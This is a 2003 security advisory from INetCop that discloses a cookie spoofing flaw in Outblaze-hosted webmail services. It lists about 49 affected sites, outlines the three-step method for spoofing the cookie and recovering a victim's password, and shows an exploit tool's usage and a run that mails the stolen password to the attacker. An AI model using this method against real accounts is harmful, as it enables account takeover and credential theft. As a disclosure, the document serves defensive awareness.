Outblaze web based email is vulnerable to user cookie spoofing that will allow an attacker to retrieve a user's password.
27cb8401290217c09af3cc57b0eac1a72004aee543b0d3820828ddb0cc9e207b
==========================================
INetCop Security Advisory #2003-0x82-014.b
==========================================
* Title: ++Danger++ Outblaze Web based e-mail that is exposed in very dangerous state !!!
0x01. Description
Hackermail.com (Outblaze Web based e-mail) is mail service that I use.
Last week, someone hacked `xploit@hackermail.com' that I'm using.
(hacked several people. wow, very funny kiddies !)
And, I looked for the first step.
It was problem in Outblaze Web based e-mail service.
I also, could find again my mail password. hehe
It because of cookie such as fool! Many mail users get overridden.
I yet, did not try conversation with mail hacking criminal.
However, It's sure that I find funny and interesting truth thanks to.
++Update Advisory version #2003-0x82-014.b++
I know interesting truth still more.
This can hack almost Outblaze Web based e-mail service !!! w00h00~!
0x02. Vulnerable Sites
Vendor site: ? http://www.outblaze.com (Desire to visit.)
+------------------------------+----------------+---------------------------+
| mail server | vulnerable? | exploitable? |
+------------------------------+----------------+---------------------------+
| http://www.amrer.net | vulnerable | exploitable |
| http://www.amuro.net | vulnerable | exploitable |
| http://www.amuromail.com | vulnerable | exploitable |
| http://www.astroboymail.com | vulnerable | exploitable |
| http://www.dbzmail.com | vulnerable | exploitable |
| http://www.doramail.com | vulnerable | exploitable |
| http://www.glay.org | vulnerable | exploitable |
| http://www.jpopmail.com | vulnerable | exploitable |
| http://www.keromail.com | vulnerable | exploitable |
| http://www.kichimail.com | vulnerable | exploitable |
| http://www.norikomail.com | vulnerable | exploitable |
| http://www.otakumail.com | vulnerable | exploitable |
| http://www.smapxsmap.net | vulnerable | - Don't change hint |
| http://www.uymail.com | vulnerable | exploitable |
| http://www.yyhmail.com | vulnerable | exploitable |
| http://mail.china139.com | vulnerable | exploitable |
| http://www.mailasia.com | vulnerable | exploitable |
| http://www.aaronkwok.net | vulnerable | exploitable |
| http://www.bsdmail.org | vulnerable | exploitable |
| http://www.bsdmail.com | vulnerable | exploitable |
| http://www.ezagenda.com | vulnerable | - Don't change hint |
| http://www.fastermail.com | vulnerable | - Don't change hint |
| http://www.wongfaye.com | vulnerable | exploitable |
| http://www.graffiti.net | vulnerable | exploitable |
| http://www.hackermail.com | vulnerable | exploitable |
| http://www.kellychen.com | vulnerable | exploitable |
| http://www.leonlai.net | vulnerable | exploitable |
| http://www.linuxmail.org | vulnerable | exploitable |
| http://www.outblaze.net | vulnerable | exploitable |
| http://www.outblaze.org | vulnerable | exploitable |
| http://www.outgun.com | vulnerable | exploitable |
| http://www.surfy.net | vulnerable | exploitable |
| http://www.pakistans.com | vulnerable | exploitable |
| http://www.jaydemail.com | vulnerable | exploitable |
| http://www.joinme.com | vulnerable | exploitable |
| http://www.marchmail.com | vulnerable | exploitable |
| http://mail.nctta.org | vulnerable | exploitable |
| http://mail.portugalnet.com | vulnerable | exploitable |
| http://boardermail.com | vulnerable | exploitable |
| http://www.mailpuppy.com | vulnerable | exploitable |
| http://www.melodymail.com | vulnerable | - Don't change hint |
| http://www.twinstarsmail.com | vulnerable | - Don't change hint |
| http://www.purinmail.com | vulnerable | exploitable |
| http://www.gundamfan.com | vulnerable | - Don't change hint |
| http://www.slamdunkfan.com | vulnerable | - Don't change hint |
| http://www.movemail.com | vulnerable | - Don't change hint |
| http://startvclub.com | vulnerable | - Don't change hint |
| http://ultrapostman.com | vulnerable | exploitable |
| http://mail.sailormoon.com | vulnerable | exploitable |
+------------------------------+----------------+---------------------------+
* We confirmed already and all.
If there is other places that use Outblaze, inform.
0x03. Exploit
Cookie Spooing Exploit method is very simple.
1. First, read user's cookie.
2. Change mail id, domain, etc... cookie informations.
3. And, deceive it. hehe, it's very easy?
Its application is very simple.
Hack user's information page. (information correction)
Thereafter, can find out password.
yah0o ~!
I exhibited exploit to my friends not long ago.
The following is my xploit execution result.
bash$ ./0x82-eat_outblaze_0dayxpl
Outblaze Web based e-mail User Cookie Spoofing 0day exploit
by Xpl017Elz.
Usage: ./0x82-eat_outblaze_0dayxpl -option [argument]
-t [target num] - target mail server.
-i [mail id] - target mail id.
-m [mail addr] - your mail address.
-h - help information.
Select target mail number:
{0} amrer.net
{1} amuro.net
{2} amuromail.com
{3} astroboymail.com
{4} dbzmail.com
{5} doramail.com
{6} glay.org
{7} jpopmail.com
{8} keromail.com
{9} kichimail.com
{10} norikomail.com
{11} otakumail.com
{12} smapxsmap.net
{13} uymail.com
{14} yyhmail.com
{15} china139.com
{16} mailasia.com
{17} aaronkwok.net
{18} bsdmail.com
{19} bsdmail.org
{20} ezagenda.com
{21} fastermail.com
{22} wongfaye.com
{23} graffiti.net
{24} hackermail.com
{25} kellychen.com
{26} leonlai.net
{27} linuxmail.org
{28} outblaze.net
{29} outblaze.org
{30} outgun.com
{31} surfy.net
{32} pakistans.com
{33} jaydemail.com
{34} joinme.com
{35} marchmail.com
{36} nctta.org
{37} portugalnet.com
{38} boardermail.com
{39} mailpuppy.com
{40} melodymail.com
{41} twinstarsmail.com
{42} purinmail.com
{43} gundamfan.com
{44} slamdunkfan.com
{45} movemail.com
{46} startvclub.com
{47} ultrapostman.com
{48} sailormoon.com
Example> ./0x82-eat_outblaze_0dayxpl -t 0 -i admin -m your_mail@mail.com
bash$
bash$ ./0x82-eat_outblaze_0dayxpl -t 24 -i tester -m attacker@testmail.com
Outblaze Web based e-mail User Cookie Spoofing 0day exploit
by Xpl017Elz.
============================================================
++ Cookie Spoofing Brute-force mode. ++
[*] Connected to http://www.hackermail.com/.
[*] target mail address: tester@hackermail.com.
[*] Wait, getting password:
This is your password: Happy-Exploit
[*] Password sent out by your e-mail (attacker@testmail.com).
============================================================
bash$
This code may have spewed password if put ID that want to attack.
Also, password is sent out your mail.
0x04. Patch
--
There is document about cookie security very much.
We notified this truth to Outblaze Web based e-mail solution before.
Soon is going to become patch.
--
Thank you.
P.S: Sorry, for my poor english.
--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net & http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
--